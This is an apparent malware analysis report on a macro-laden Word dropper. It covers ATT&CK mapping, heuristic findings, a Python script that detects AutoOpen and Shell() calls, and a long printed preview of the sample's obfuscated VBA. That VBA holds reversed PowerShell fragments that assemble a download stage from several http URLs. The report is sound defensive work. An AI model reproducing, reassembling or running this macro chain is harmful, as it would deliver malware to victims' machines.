Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document carrying VBA macros (OLE_VBA_MACROS, OLE_VBA_AUTOOPEN). The critical OLE_VBA_SHELL finding means the macro calls Shell(), that is, it hands a command to the operating system rather than staying inside the VBA runtime; the call sits beyond the previewed lines of macros.bas, so it is not visible below. SE_PASSWORD_ARCHIVE_LURE indicates the document instructs the user to open a password-protected archive, a common way to keep a payload encrypted until it is past gateway scanning. The Autoopen procedure runs when the document is opened and starts the chain: it passes the return value of iQfXBvCI to a procedure (uKIzvuWwhpD) that the preview does not include, and iQfXBvCI assembles that value from string constants which, read right to left with the '+' joins removed, contain PowerShell tokens (System.Net.Web, new-object, .Split, -replace, [Char]) and several http:// URLs separated by '@'. That points to a download stage, so T1059.001 (PowerShell) would be justified in addition to the T1059.005 entry above. The surrounding arithmetic (Sgn, Fix, CDbl over undeclared variables, assigned to variables that are never read) and the unused procedures are padding. One inconsistency to note: the OLE_LEGACY_WORDBASIC_AUTOEXEC description says no modern VBA project was recovered, which the extracted macros.bas contradicts; treat that marker as redundant with OLE_VBA_AUTOOPEN here.
Heuristics (7)

| Heuristic | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Dropper.Agent-6543332-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Dropper.Agent-6543332-0 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (2 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| Password-protected archive handoff | high | SE_PASSWORD_ARCHIVE_LURE | Document gives password instructions for an archive or attachment, often used to keep payloads encrypted until after gateway scanning |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the OOXML DrawingML schema namespace, not a host the macro contacts. |
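To reproduce the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL checks on the extracted macros.bas, and to find which of the padding procedures the entry point actually reaches, here is an added example in Python. It is not the analyzer's code and does not use oletools. SAMPLE_VBA is copied from the macro preview further down and trimmed to three procedures; SHELL_STUB is a constructed stand-in for the Shell() call the analyzer flagged, which lies outside the previewed lines; AUTOEXEC_NAMES and VBA_BUILTINS are hand-picked lists, not complete ones.

```python
import re
from collections import deque

# SAMPLE_VBA: copied from the macros.bas preview, trimmed to three procedures.
SAMPLE_VBA = '''Attribute VB_Name = "mPkTWCQHoBKZB"
Sub JlAnis(TwaGZB)
piMcJN = YLSlQ + Sgn(91093 - bFnoBD - jJBzX + Fix(6584)) - 65506 - CDbl(92662)
End Sub
Sub Autoopen()
On Error Resume Next
JIuccI = ScFOu + Sgn(79874 - cwnIN - MEMsHE + Fix(22831)) - 99687 - CDbl(22178)
uKIzvuWwhpD (wEttoj + iQfXBvCI + cHzZY)
End Sub
Function iQfXBvCI()
On Error Resume Next
CREsShnpEN = uJOXwd("zOd9Q ))69]raHC[,'G5o' ecAlper- 29]raHC[", 62186 + 3 - 62186, 62186 + 53 - 62186)
End Function
'''

# SHELL_STUB: constructed stand-in for the Shell() call OLE_VBA_SHELL reported;
# it is NOT from the sample, whose Shell() call is outside the preview.
SHELL_STUB = '''Sub RunStage(cmd)
' constructed stand-in, not from the sample
Set wsh = CreateObject("WScript.Shell")
Shell cmd, vbHide
End Sub
'''

# Procedure names Office runs without a click. VBA is case-insensitive, so the
# sample's "Autoopen" is the AutoOpen the heuristic reports. Hand-picked list.
AUTOEXEC_NAMES = {"autoopen", "autoexec", "autonew", "autoclose", "autoexit",
                  "document_open", "document_close", "workbook_open", "auto_open"}

# Calls that leave the VBA runtime. CreateObject is included because
# WScript.Shell / Shell.Application are reached through it.
SHELL_PATTERNS = [r"\bShell\s*\(", r"^\s*Shell\b", r"WScript\.Shell", r"\bCreateObject\s*\("]

# Built-ins and keywords that look like calls but are not user procedures (partial list).
VBA_BUILTINS = {"sgn", "fix", "cdbl", "cint", "clng", "cstr", "chr", "mid", "left",
                "right", "len", "strreverse", "replace", "split", "array", "int",
                "abs", "ubound", "lbound", "if", "elseif", "while", "until", "not", "and", "or"}

PROC_RE = re.compile(
    r"^[ \t]*(?:Public[ \t]+|Private[ \t]+)?(Sub|Function)[ \t]+(\w+)[ \t]*\([^)]*\)[^\n]*\n"
    r"(.*?)^[ \t]*End[ \t]+\1[ \t]*$",
    re.IGNORECASE | re.MULTILINE | re.DOTALL)
STRING_RE = re.compile(r'"[^"\n]*"')   # VBA doubles quotes inside strings, so "" is two empty literals
IDENT_RE = re.compile(r"\b([A-Za-z_]\w*)\b")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)[ \t]*\(")


def parse_procedures(vba):
    """Map lower-cased procedure name -> (name as written, body with string literals blanked)."""
    procs = {}
    for m in PROC_RE.finditer(vba):
        _, name, body = m.groups()
        procs[name.lower()] = (name, STRING_RE.sub('""', body))
    return procs


def find_autoexec(vba):
    """Names of auto-execution entry points, as written in the source."""
    return [name for key, (name, _) in parse_procedures(vba).items() if key in AUTOEXEC_NAMES]


def find_shell_calls(vba):
    """(line number, line) for lines that hand control outside VBA; comment lines are skipped."""
    hits = []
    for no, line in enumerate(vba.splitlines(), start=1):
        if line.lstrip().startswith("'"):
            continue
        if any(re.search(p, line, re.IGNORECASE) for p in SHELL_PATTERNS):
            hits.append((no, line.strip()))
    return hits


def reachable_from(vba, entry):
    """Procedures reached from `entry`, plus call targets not defined in the source
    (for this sample: helpers that the preview cut off)."""
    procs = parse_procedures(vba)
    if entry.lower() not in procs:
        raise ValueError(f"no procedure named {entry!r}")
    reached, unresolved, seen = [], set(), {entry.lower()}
    queue = deque([entry.lower()])
    while queue:
        _, body = procs[queue.popleft()]
        for ident in IDENT_RE.findall(body):      # parentheses are optional in VBA calls
            key = ident.lower()
            if key in procs and key not in seen:
                seen.add(key)
                reached.append(procs[key][0])
                queue.append(key)
        for callee in CALL_RE.findall(body):      # explicit call syntax to something undefined
            key = callee.lower()
            if key not in procs and key not in VBA_BUILTINS:
                unresolved.add(callee)
    return reached, sorted(unresolved)


if __name__ == "__main__":
    print("auto-exec:", find_autoexec(SAMPLE_VBA))
    print("reachable from Autoopen:", reachable_from(SAMPLE_VBA, "Autoopen"))
    print("shell-like calls in preview:", find_shell_calls(SAMPLE_VBA))
    print("shell-like calls in stub:", find_shell_calls(SHELL_STUB))
```

Two points the output makes: the entry-point match must be case-insensitive (the sample spells it Autoopen), and the preview on its own yields no Shell() hit, so the reachability result, which ends in two undefined names (uJOXwd and uKIzvuWwhpD), tells you where in the full 123 KB of source to look next.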
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 123835 bytes | bee0ac40a5e438f2d7f1016d0a647081b9a84268f2fc0a9a1b4fa42a24566b86 |
Preview: first 1,000 lines of the extracted script (the listing below is itself cut short at the truncation marker)
```vba
' Module 1. olevba concatenates every recovered module into macros.bas; each
' "Attribute VB_Name" line marks the start of a new module.
Attribute VB_Name = "mPkTWCQHoBKZB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Junk procedures: arithmetic over undeclared variables (Empty, so they count as 0)
' assigned to variables that are never read. They only pad the module.
Sub JlAnis(TwaGZB)
    piMcJN = YLSlQ + Sgn(91093 - bFnoBD - jJBzX + Fix(6584)) - 65506 - CDbl(92662)
    JVvsk = BtOii
    ahBSzG = qmSXzT
    VKclK = 69863
End Sub
Sub EIQVDt(DtaTZ)
    Fbzhaw = FUrzzZ + Sgn(52783 - rRcXuI - YlzuN + Fix(57405)) - 75045 - CDbl(86423)
    EYjDtK = LNuXkR
    YiSWM = zvfakC
    kjjMS = 52117
    tYpYwj = QKzll + Sgn(14126 - YQvHa - uIsJT + Fix(82131)) - 92913 - CDbl(21708)
    dhEJSY = otYjGh
    fpwvuL = oErKF
    jfFHkK = 70876
    RjcpuZ = BjtKNX + Sgn(24722 - UvBAP - dMwMnS + Fix(17274)) - 78280 - CDbl(32373)
    vwEOIW = AlonV
    ArNTLk = iKVro
    dcHGS = 24193
End Sub
Sub zOQSw(woBOa)
    HOwVZ = zEENkb + Sgn(24488 - psdsi - aDAlb + Fix(90260)) - 39562 - CDbl(1540)
    Xhvuqj = fHhHV
    NkipG = VFKIk
    aEOMt = 59076
    wShfoj = skNWL + Sgn(44741 - SpPHl - vfjMZL + Fix(80939)) - 30515 - CDbl(55005)
    SNCcYq = FpIjhk
    owNCHO = FIpjRl
    FdqGP = 90785
End Sub

' Auto-execution entry point: Word runs this when the document is opened.
' VBA names are case-insensitive, so "Autoopen" is the AutoOpen the heuristic reports.
Sub Autoopen()
    On Error Resume Next    ' swallow any runtime error so the chain continues silently
    JIuccI = ScFOu + Sgn(79874 - cwnIN - MEMsHE + Fix(22831)) - 99687 - CDbl(22178)
    dRpvi = SZfGqm
    kVWvwc = DwCFiE
    CVXwJG = 20549
    ' wEttoj and cHzZY are undeclared (Empty), so this passes the string returned by
    ' iQfXBvCI to uKIzvuWwhpD, a procedure that lies outside the previewed lines.
    uKIzvuWwhpD (wEttoj + iQfXBvCI + cHzZY)
    WkJPWj = iPkMZ + Sgn(85819 - EHJjf - JYSBC + Fix(77324)) - 97803 - CDbl(79333)
    uFIjT = kOhmaw
    hUhTwQ = VwTuD
    zSHMi = 64508
End Sub
Sub IUiDt(kTsbt)
    ZMqwU = sifAwm + Sgn(28570 - AhSHUE - WoNpda + Fix(44018)) - 62660 - CDbl(80199)
    WZodGH = mdqzt
    YsoQY = BlGpM
    XdIqJ = 40932
    pYZMa = tazUrN + Sgn(87898 - fpwoJw - oqQjcb + Fix(67262)) - 56800 - CDbl(22279)
    UVzDjw = ORfbDQ
    cSZso = BzXXB
    JczYKz = 73806
    WswZw = RarSCk + Sgn(50866 - HJBqp - uUwaBC + Fix(80062)) - 6125 - CDbl(32070)
    UiRrtk = Awwub
    EURHI = oWTHm
    BtVXtA = 26617
End Sub
Sub wwYSi(XmAur)
    SNuFk = jicWAW + Sgn(59277 - rqAdC - jSJFww + Fix(46865)) - 3521 - CDbl(95233)
    VZQhM = zQnwTf
    bzBoVP = mXstYz
    oIlWi = 70422
End Sub

' Module 2.
Attribute VB_Name = "BbFzADqkpEd"
Sub lhIuK(mQPzj)
    JMkLH = bpvGa + Sgn(40951 - qUMqCh - QXOWfO + Fix(51431)) - 38622 - CDbl(85605)
    LDvio = Sicoco
    iHnwT = aZNQsH
    zOftbH = 93500
End Sub

' Assembles the next-stage string. uJOXwd is not in the preview; its numeric arguments
' ("62186 + 3 - 62186") collapse to small constants (3, 53 / 5, 175 / 3, 168 / 4, ...).
Function iQfXBvCI()
    On Error Resume Next
    vXaNCj = LZtLbQ + Sgn(70167 - sPGlS - znCbCq + Fix(9279)) - 98457 - CDbl(67472)
    Vrfjk = lRBjN
    WhfVNz = iUVifz
    XlApoM = 81326
    NzoNci = XHuIa + Sgn(93738 - LLsrz - LVvRt + Fix(91494)) - 5209 - CDbl(74700)
    NSQmvR = UziqB
    lnccFA = LdqWW
    sBWUjf = 28159
    ' The string constants are reversed PowerShell fragments joined with '+': read right to
    ' left, "ecAlper" is "replAce", "tilpS" is "Split", "ptth" is "http".
    CREsShnpEN = uJOXwd("zOd9Q ))69]raHC[,'G5o' ecAlper- 29]raHC[,)87]raHC[+701]raoc", 62186 + 3 - 62186, 62186 + 53 - 62186)
    tcroBj = qsNJR + Sgn(26485 - IpQqBi - kbuPNY + Fix(11861)) - 96405 - CDbl(58991)
    KnVrLk = DREVld
    EUJth = qdkrJ
    zYnKz = 84760
    wQozC = sDXIWB + Sgn(40934 - XBjEw - PHJKQh + Fix(30984)) - 84329 - CDbl(78644)
    SziivT = qGdjJm
    vLBQvk = jTmBrH
    jVXAOo = 80226
    umCtXoj = uJOXwd("ML, CDSH3a;)X'+'6y@X'+'6y(tilpS.X6y/B8V'+'VVJ'+'G/moc.ovoted'+'//:ptth'+'@/HrEUR'+'/moc.'+'eir'+'tsudni-'+'eira//:pt'+'th@/YY3n'+'FS/ed'+'.esie'+'r-nrey'+'ab//'+':ptth@/4E'+'hGM/nijp", 26860 + 5 - 26860, 26860 + 175 - 26860)
    WrQDP = zUPFUi + Sgn(29153 - jzwEq - jsdELI + Fix(18797)) - 71447 - CDbl(11571)
    vwoYoK = rVAiw
    vXcOb = YEKzDr
    OMsGiM = 28396
    wfwWYd = iJtlX + Sgn(99691 - IqCQF - mLhhN + Fix(3604)) - 85527 - CDbl(27579)
    IiRLdk = LqbmY
    QaTnI = BPQIc
    tkzPIW = 71102
    EZMDuTT = uJOXwd("bSited.nesier-anit'+'a//'+':pt'+'th@/Vm'+'TY'+'M3N/'+'zib.mar'+'gtpa//'+':'+'p'+'tth X6y = XCDAH'+'3'+'a;)331282 ,00'+'001'+'('+'txen.d'+'sada'+'s'+'nH3a '+'= BSNH3a;tneilCSP", 63779 + 3 - 63779, 63779 + 168 - 63779)
    mBKTLV = IiMpSi + Sgn(26585 - GOathM - rapQkz + Fix(4963)) - 93420 - CDbl(64183)
    CimOQ = bmfslD
    KRfoq = idDhJ
    kivlf = 12249
    ziMjB = kVjsQ + Sgn(84936 - bNFhot - PAhbG + Fix(13115)) - 27158 - CDbl(27021)
    RiiQCU = mrKXi
    VoYXwJ = vVWOw
    zAkduH = 42755
    rbtTjqasHa = uJOXwd("U7Z%@beW'+'.t'+'eN.m'+'ets'+'yS )X6'+'yt'+'c'+'ejbo-X'+'6y+'+'X'+'6yw'+'X6y+X6yenX'+'6y(. = UYYH3a;m'+'odnar )'+'X'+'6ytX6'+'y'+'+X6kUB", 65407 + 4 - 65407,
```
... (truncated)